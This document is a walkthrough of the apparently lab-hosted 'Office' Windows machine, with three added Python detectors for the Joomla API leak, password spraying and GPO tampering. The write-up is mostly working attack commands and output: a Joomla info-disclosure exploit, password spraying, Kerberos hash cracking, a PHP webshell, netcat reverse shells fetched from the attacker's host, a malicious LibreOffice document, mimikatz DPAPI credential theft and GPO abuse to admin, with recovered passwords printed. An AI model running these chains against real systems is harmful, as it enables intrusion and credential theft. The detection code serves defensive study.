Office

OS: Windows
Difficulty: Hard
Points: 40

Nmap

ports=$(nmap -p- --min-rate=5000 -T4 10.10.11.3 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV 10.10.11.3
Nmap scan report for 10.10.11.3
Host is up (0.078s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/ 
| /cache/ /cli/ /components/ /includes/ /installation/ 
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-title: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-08 00:30:15Z)
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
443/tcp   open  ssl/http      Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
54080/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
54086/tcp open  msrpc         Microsoft Windows RPC
54112/tcp open  msrpc         Microsoft Windows RPC
63359/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: DC, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

If we access the web portal on port 80 we see that it is running Joomla, as the nmap scan also indicates.

We enumerate the version in use.

curl http://10.10.11.3/administrator/manifests/files/joomla.xml | grep version
<?xml version="1.0" encoding="UTF-8"?>
        <license>GNU General Public License version 2 or later; see LICENSE.txt</license>
        <version>4.2.7</version>

The version in use is 4.2.7, which has a registered CVE, API Unauthenticated Information Disclosure (CVE-2023-23752). Querying the following URL we obtain a password.

curl 'http://10.10.11.3/api/index.php/v1/config/application?public=true'
{"type":"application","id":"224","attributes":{"password":"H0lOgrams4reTakIng0Ver754!","id":224}
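Added detection example, not part of the original writeup: the request above leaves a clear trace in the Apache access log, so a defender can flag unauthenticated reads of the Joomla 4 Web Services API with `public=true` (the CVE-2023-23752 pattern) and the version fingerprint that usually precedes them. The log lines are constructed samples in Apache combined format; the fix on the server side is upgrading Joomla to 4.2.8 or later.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format access log lines (not from the page): a version
# fingerprint request, two unauthenticated API reads that succeeded, normal traffic,
# and an API request without public=true that the server rejected.
SAMPLE_LOG = """\
10.10.14.132 - - [07/Jun/2024:12:40:01 -0400] "GET /administrator/manifests/files/joomla.xml HTTP/1.1" 200 2331 "-" "curl/8.5.0"
10.10.14.132 - - [07/Jun/2024:12:40:09 -0400] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1412 "-" "curl/8.5.0"
10.10.14.50 - - [07/Jun/2024:12:41:00 -0400] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 880 "-" "Mozilla/5.0"
10.10.14.7 - - [07/Jun/2024:12:42:00 -0400] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.7 - - [07/Jun/2024:12:43:00 -0400] "GET /api/index.php/v1/config/application HTTP/1.1" 401 120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Joomla 4 Web Services routes that CVE-2023-23752 exposes: config/application
# returns the site configuration (including DB credentials), users lists accounts.
SENSITIVE_PREFIXES = ("/api/index.php/v1/config/", "/api/index.php/v1/users")


def classify(line):
    """Return a finding dict for one access-log line, or None if it is benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    public = parse_qs(url.query).get("public", [""])[0].lower() == "true"
    status = int(m["status"])
    if url.path.startswith(SENSITIVE_PREFIXES) and public:
        # A 200 means the server honoured public=true without authentication:
        # the data left the box. Anything else is an attempt worth noting.
        kind = "cve-2023-23752-success" if status == 200 else "cve-2023-23752-attempt"
        return {"ip": m["ip"], "ts": m["ts"], "path": url.path, "status": status, "kind": kind}
    if url.path.endswith("/administrator/manifests/files/joomla.xml"):
        # Version fingerprinting usually precedes the API read.
        return {"ip": m["ip"], "ts": m["ts"], "path": url.path, "status": status,
                "kind": "version-fingerprint"}
    return None


def scan_log(text):
    """Run classify() over every line and keep the findings, in log order."""
    return [f for f in map(classify, text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']:<14} {f['kind']:<24} {f['status']} {f['path']}")
```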

Kerbrute Enum

We also enumerate users with kerbrute.

/opt/windows/kerbrute userenum -d office.htb --dc 10.10.11.3  /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
2024/06/07 12:56:03 >  [+] VALID USERNAME:       administrator@office.htb
2024/06/07 12:57:51 >  [+] VALID USERNAME:       Administrator@office.htb
2024/06/07 12:58:49 >  [+] VALID USERNAME:       ewhite@office.htb
2024/06/07 12:58:49 >  [+] VALID USERNAME:       etower@office.htb
2024/06/07 12:58:49 >  [+] VALID USERNAME:       dwolfe@office.htb
2024/06/07 12:58:50 >  [+] VALID USERNAME:       dmichael@office.htb
2024/06/07 12:58:50 >  [+] VALID USERNAME:       dlanor@office.htb

With those users we do a password spray using crackmapexec.

crackmapexec smb 10.10.11.3 -u users.txt -p 'H0lOgrams4reTakIng0Ver754!'
SMB         10.10.11.3      445    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.3      445    DC               [-] office.htb\ewhite:H0lOgrams4reTakIng0Ver754! STATUS_LOGON_FAILURE 
SMB         10.10.11.3      445    DC               [-] office.htb\etower:H0lOgrams4reTakIng0Ver754! STATUS_LOGON_FAILURE 
SMB         10.10.11.3      445    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754!

The password works with the user dwolfe.

dwolfe : H0lOgrams4reTakIng0Ver754!
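Added detection example, not part of the original writeup: the spray above produces a burst of failed logons (Event ID 4625, network logon) from one source against several different accounts, followed by a success (4624) from the same source. The events below are constructed samples carrying only the fields the logic needs (EventID, time, IpAddress, TargetUserName); the window and user threshold are assumptions to tune.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log events (EventID, time, source IpAddress, TargetUserName);
# not from the page. 4625 = failed logon, 4624 = successful logon.
# 10.10.14.132 sprays one password across five accounts; 10.10.14.7 hammers one
# account (brute force, not a spray) and must not be reported by this rule.
EVENTS = [
    (4625, "2024-06-07 13:02:10", "10.10.14.132", "ewhite"),
    (4625, "2024-06-07 13:02:10", "10.10.14.132", "etower"),
    (4624, "2024-06-07 13:02:11", "10.10.14.132", "dwolfe"),
    (4625, "2024-06-07 13:02:11", "10.10.14.132", "dmichael"),
    (4625, "2024-06-07 13:02:12", "10.10.14.132", "dlanor"),
    (4625, "2024-06-07 09:00:00", "10.10.14.7", "hhogan"),
    (4625, "2024-06-07 09:00:30", "10.10.14.7", "hhogan"),
    (4625, "2024-06-07 09:01:00", "10.10.14.7", "hhogan"),
]


def detect_spray(events, window=timedelta(minutes=5), min_users=3):
    """Flag sources whose failed logons hit >= min_users distinct accounts inside
    one sliding window; a success from the same source in that window is reported
    too, because that is the case that needs an immediate password reset."""
    by_src = defaultdict(list)
    for eid, ts, src, user in events:
        by_src[src].append((datetime.fromisoformat(ts), eid, user))

    alerts = []
    for src, evs in by_src.items():
        evs.sort()
        best = None
        for i, (start, _, _) in enumerate(evs):
            failed, succeeded = set(), set()
            for t, eid, user in evs[i:]:
                if t - start > window:
                    break
                if eid == 4625:
                    failed.add(user)
                elif eid == 4624:
                    succeeded.add(user)
            if len(failed) >= min_users and (best is None or len(failed) > len(best["failed_users"])):
                best = {
                    "source": src,
                    "window_start": start.isoformat(sep=" "),
                    "failed_users": sorted(failed),
                    "succeeded_users": sorted(succeeded),
                }
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect_spray(EVENTS):
        print(f"{a['source']} from {a['window_start']}: failed={a['failed_users']} "
              f"succeeded={a['succeeded_users']}")
```

The same sliding-window logic applies to SMB (port 445) and Kerberos pre-authentication failures (Event ID 4771), which is where a spray like the one above lands on a domain controller.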

SMB Enum

Using the credentials we see that there is a shared directory.

smbclient -L 10.10.11.3 -U dwolfe
Password for [WORKGROUP\dwolfe]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SOC Analysis    Disk      
        SYSVOL          Disk      Logon server share

Accessing the share, there is a pcap file that we can download.

smbclient '//10.10.11.3/SOC Analysis' -U dwolfe
smb: \> dir
  .                                   D        0  Wed May 10 14:52:24 2023
  ..                                DHS        0  Wed Feb 14 05:18:31 2024
  Latest-System-Dump-8fbc124d.pcap      A  1372860  Sun May  7 20:59:00 2023

                6265599 blocks of size 4096. 1210820 blocks available
smb: \> get Latest-System-Dump-8fbc124d.pcap
getting file \Latest-System-Dump-8fbc124d.pcap of size 1372860 as Latest-System-Dump-8fbc124d.pcap (635.7 KiloBytes/sec) (average 635.7 KiloBytes/sec)

Wireshark Analysis

After analyzing the file we find a couple of Kerberos packets containing a pre-authentication hash that can potentially be cracked.

We follow this blog post, which explains the method.

https://vbscrub.com/2020/02/27/getting-passwords-from-kerberos-pre-authentication-packets/

We copy the hash information.

$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc

Crack hash

Using hashcat we obtain the password.

hashcat -m 19900 hash.txt /usr/share/wordlists/rockyou.txt
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs

$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc:playboy69

Joomla RCE

With those credentials we can log in to Joomla.

administrator : playboy69

We can obtain RCE in the following way.

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla#rce

We browse to the following URL.

http://10.10.11.3/administrator/index.php?option=com_templates&view=template&id=223&file=Ly9lcnJvci5waHA%3D&isMedia=0

We modify the error.php file and save.

system($_GET['cmd']);

Now we query our webshell.

http://10.10.11.3/templates/cassiopeia/error.php?cmd=whoami

Reverse shell

We run the following commands to get a reverse shell.

mkdir c:\temp
curl 10.10.14.132/nc64.exe -o c:\temp\nc.exe
c:\temp\nc.exe -e cmd.exe 10.10.14.132 1234
┌──(root㉿kali)-[~/htb/Box/Office]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.132] from (UNKNOWN) [10.10.11.3] 51769
Microsoft Windows [Version 10.0.20348.2322]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\joomla\templates\cassiopeia>whoami
whoami
office\web_account

Lateral Movement

We find a local open port, 8083.

netstat -ano
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8083           0.0.0.0:0              LISTENING       1032
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2628

The port serves a web page.

c:\>curl localhost:8083
<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="css/squarely.css">
    <!--common.css  -->
      <link rel="stylesheet" href="css/common.css">
    <title>Holography Industries</title>
  </head>
  <body>

The files for this web page are located at the following path.

dir c:\xampp\htdocs\internal

In the resume.php code we see that it stores odt files in the applications directory.

$extension = strtolower(end($ext));
$filesallowed = array('docm','docx','doc','odt');
if(in_array($extension,$filesallowed)){
  if ($fileerr === 0){
    if ($filesize < 5242880){
      $ff = "$rewritefn.$extension";
      $loc = "applications/".$ff;
      if(move_uploaded_file($filetmp,$loc))
      {
        // upload successful
        $notifi="<span class=notifi>✔ Upload Successful!</span><hr/><style>
          button, input , select, option, h3{
            display:none;
          }
        </style>";
      } else {

LibreOffice (CVE-2023-2255)

Among the programs installed on the system we also find LibreOffice, version 5.2.

C:\> type "Program Files\LibreOffice 5\readmes\readme_en-US.txt"


======================================================================

We hope you enjoy working with the new LibreOffice 5.2 and will join us online.

======================================================================

This LibreOffice version is vulnerable to the following exploit.

https://github.com/elweth-sec/CVE-2023-2255

Therefore we can exploit the vulnerability by creating our file and dropping it in the applications directory.

┌──(root㉿kali)-[~/htb/Box/Office/CVE-2023-2255]
└─# python3 CVE-2023-2255.py --cmd "c:\temp\nc.exe -e cmd.exe 10.10.14.132 4444" --output 'doom.odt'
File doom.odt has been created !

We download our file.

curl 10.10.14.132/doom.odt -o doom.odt
c:\xampp\htdocs\internal\applications>curl 10.10.14.132/doom.odt -o doom.odt
curl 10.10.14.132/doom.odt -o doom.odt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 30529  100 30529    0     0   121k      0 --:--:-- --:--:-- --:--:--  121k

c:\xampp\htdocs\internal\applications>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C626-9388

 Directory of c:\xampp\htdocs\internal\applications

06/07/2024  08:33 PM    <DIR>          .
01/30/2024  09:39 AM    <DIR>          ..
06/07/2024  08:33 PM            30,529 doom.odt
               1 File(s)         30,529 bytes
               2 Dir(s)   4,918,906,880 bytes free

We wait a moment and get our reverse shell.

┌──(root㉿kali)-[~/htb/Box/Office]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.132] from (UNKNOWN) [10.10.11.3] 51999
Microsoft Windows [Version 10.0.20348.2322]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice 5\program>whoami
whoami
office\ppotts

Privilege Escalation

We see that there are stored credentials.

Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\
    Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a-hs-          5/9/2023   2:08 PM            358 18A1927A997A794B65E9849883AC3F3E                                     
-a-hs-          5/9/2023   4:03 PM            398 84F1CAEEBF466550F4967858F9353FB4                                     
-a-hs-         1/18/2024  11:53 AM            374 E76CCA3670CD9BB98DF79E0A8D176F1E

We also locate the master keys.

dir C:\Users\PPotts\AppData\Roaming\Microsoft\Protect
    Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Protect


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d---s-          6/7/2024   5:02 AM                S-1-5-21-1199398058-4196589450-691661856-1107
Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\
    Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a-hs-         1/17/2024   3:43 PM            740 10811601-0fa9-43c2-97e5-9bef8471fc7d                                 
-a-hs-          5/2/2023   4:13 PM            740 191d3f9d-7959-4b4d-a520-a444853c47eb                                 
-a-hs-          5/2/2023   4:13 PM            900 BK-OFFICE                                                            
-a-hs-          6/7/2024   5:02 AM            740 da923a1f-5364-4062-806c-9553f2d997e6                                 
-a-hs-          6/7/2024   5:02 AM             24 Preferred

Using the following resource we can extract passwords.

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords

DPAPI Credentials

To access those credentials we will use mimikatz.

c:\temp>curl 10.10.14.132/mimikatz.exe -o mimikatz.exe
curl 10.10.14.132/mimikatz.exe -o mimikatz.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 1220k  100 1220k    0     0   859k      0  0:00:01  0:00:01 --:--:--  859k
mimikatz # dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\credentials\84F1CAEEBF466550F4967858F9353FB4
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {191d3f9d-7959-4b4d-a520-a444853c47eb}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006603 - 26115 (CALG_3DES)
  dwAlgCryptLen      : 000000c0 - 192
  dwSaltLen          : 00000010 - 16
  pbSalt             : 649c4466d5d647dd2c595f4e43fb7e1d
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         : 
  algHash            : 00008004 - 32772 (CALG_SHA1)
  dwAlgHashLen       : 000000a0 - 160
  dwHmac2KeyLen      : 00000010 - 16
  pbHmack2Key        : 32e88dfd1927fdef0ede5abf2c024e3a
  dwDataLen          : 000000c0 - 192
  pbData             : f73b168ecbad599e5ca202cf9ff719ace31cc92423a28aff5838d7063de5cccd4ca86bfb2950391284b26a34b0eff2dbc9799bdd726df9fad9cb284bacd7f1ccbba0fe140ac16264896a810e80cac3b68f82c80347c4deaf682c2f4d3be1de025f0a68988fa9d633de943f7b809f35a141149ac748bb415990fb6ea95ef49bd561eb39358d1092aef3bbcc7d5f5f20bab8d3e395350c711d39dbe7c29d49a5328975aa6fd5267b39cf22ed1f9b933e2b8145d66a5a370dcf76de2acdf549fc97
  dwSignLen          : 00000014 - 20
  pbSign             : 21bfb22ca38e0a802e38065458cecef00b450976

We extract and decrypt the masterkey.

dpapi::masterkey /in:C:\Users\PPotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc
Auto SID from path seems to be: S-1-5-21-1199398058-4196589450-691661856-1107

[domainkey] with RPC
[DC] 'office.htb' will be the domain
[DC] 'DC.office.htb' will be the DC server
  key : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
  sha1: 85285eb368befb1670633b05ce58ca4d75c73c77

We extract the password with the masterkey.

dpapi::cred /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4" /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 5/9/2023 11:03:21 PM
  unkFlagsOrSize : 00000018 - 24
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:interactive=OFFICE\HHogan
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : OFFICE\HHogan
  CredentialBlob : H4ppyFtW183#
  Attributes     : 0

With those credentials we connect via WinRM.

┌──(root㉿kali)-[~/htb/Box/Office]
└─# evil-winrm -i 10.10.11.3 -u hhogan -p 'H4ppyFtW183#'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\HHogan\Documents> whoami
office\hhogan
*Evil-WinRM* PS C:\Users\HHogan\Documents>

This user belongs to the GPO Managers group.

*Evil-WinRM* PS C:\Users\HHogan\Documents> net user hhogan
User name                    HHogan
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/6/2023 11:59:34 AM
Password expires             Never
Password changeable          5/7/2023 11:59:34 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/10/2023 5:30:58 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users         *GPO Managers
The command completed successfully.

SharpGPOAbuse - Abuse GPO

We can abuse this group with the SharpGPOAbuse tool.

*Evil-WinRM* PS C:\temp> curl 10.10.14.132/SharpGPOAbuse.exe -o SharpGPOAbuse.exe
*Evil-WinRM* PS C:\temp> dir


    Directory: C:\temp


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/7/2024   8:55 PM        1250056 mimikatz.exe
-a----          6/7/2024   7:53 PM          45272 nc.exe
-a----          6/7/2024   9:28 PM          80896 SharpGPOAbuse.exe

We modify the Default Domain Policy GPO.

*Evil-WinRM* PS C:\temp> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount HHogan --GPOName "Default Domain Policy"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of HHogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
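Added detection example, not part of the original writeup or of SharpGPOAbuse: the change above lands in the GPO's GptTmpl.inf in SYSVOL as a Restricted Groups entry, so a defender can periodically parse every GptTmpl.inf and diff the `[Group Membership]` section against a baseline. The sample file is constructed; it assumes the secedit key format `*<GroupSID>__Members = *<MemberSID>` and a baseline that the defender maintains.

```python
import configparser

# Well-known local group SIDs that Restricted Groups entries commonly target.
WELL_KNOWN = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-555": "BUILTIN\\Remote Desktop Users",
    "S-1-5-32-580": "BUILTIN\\Remote Management Users",
}

# Defender-maintained baseline of who may be pushed into each local group by GPO.
# Constructed placeholder: replace with the SIDs your own policy really grants.
BASELINE = {"S-1-5-32-544": {"S-1-5-21-<your-domain-sid>-512"}}

# Constructed GptTmpl.inf as it looks after a local-admin entry has been added
# (SID taken from the page's SharpGPOAbuse output). SYSVOL stores it UTF-16LE with BOM.
SAMPLE_INF = (
    "\ufeff[Unicode]\r\nUnicode=yes\r\n"
    "[Version]\r\nsignature=\"$CHICAGO$\"\r\nRevision=1\r\n"
    "[Group Membership]\r\n"
    "*S-1-5-32-544__Memberof =\r\n"
    "*S-1-5-32-544__Members = *S-1-5-21-1199398058-4196589450-691661856-1108\r\n"
)
SAMPLE_BYTES = SAMPLE_INF.encode("utf-16-le")
# Same file before the change: no [Group Membership] section at all.
CLEAN_BYTES = SAMPLE_INF.split("[Group Membership]")[0].encode("utf-16-le")


def decode_inf(data):
    """GptTmpl.inf is usually UTF-16LE with a BOM, occasionally plain ASCII."""
    if data.startswith(b"\xff\xfe"):
        text = data.decode("utf-16")
    else:
        text = data.decode("utf-8", errors="replace").lstrip("\ufeff")
    return text.replace("\r\n", "\n")


def parse_group_membership(text):
    """Return {group_sid: {"Members": [...], "Memberof": [...]}} from the INF text."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep SID case and the leading '*' exactly as written
    cp.read_string(text)
    result = {}
    if not cp.has_section("Group Membership"):
        return result
    for key, value in cp.items("Group Membership"):
        group, _, kind = key.lstrip("*").partition("__")
        members = [v.strip().lstrip("*") for v in value.split(",") if v.strip()]
        result.setdefault(group, {})[kind] = members
    return result


def audit_gpttmpl(data, baseline=BASELINE):
    """One finding per member that a GPO pushes into a local group without being in the baseline."""
    findings = []
    for group, kinds in parse_group_membership(decode_inf(data)).items():
        for member in kinds.get("Members", []):
            if member not in baseline.get(group, set()):
                findings.append({"group": group,
                                 "group_name": WELL_KNOWN.get(group, group),
                                 "member": member})
    return findings


if __name__ == "__main__":
    for f in audit_gpttmpl(SAMPLE_BYTES):
        print(f"unexpected member {f['member']} in {f['group_name']} ({f['group']})")
```

In production, pair this file-level check with Directory Service Changes auditing (Event ID 5136) on the groupPolicyContainer objects, since the versionNumber bump shown in the output above is recorded there before the clients ever refresh.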

We update the policies.

*Evil-WinRM* PS C:\temp> gpupdate /force
Updating policy...



Computer Policy update has completed successfully.

User Policy update has completed successfully.

We are now administrators.

*Evil-WinRM* PS C:\temp> net user hhogan
User name                    HHogan
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/6/2023 11:59:34 AM
Password expires             Never
Password changeable          5/7/2023 11:59:34 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/10/2023 5:30:58 AM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
Global Group memberships     *Domain Users         *GPO Managers
The command completed successfully.

We close the session and connect again to get the flags.

*Evil-WinRM* PS C:\users\Administrator\desktop> type root.txt
ec424b2bbacea5d3aa115ad4438a84f3
*Evil-WinRM* PS C:\users\Administrator\desktop> type c:\users\tstark\desktop\user.txt
d05e09504294d1337a0824ef8bef2898
*Evil-WinRM* PS C:\users\Administrator\desktop>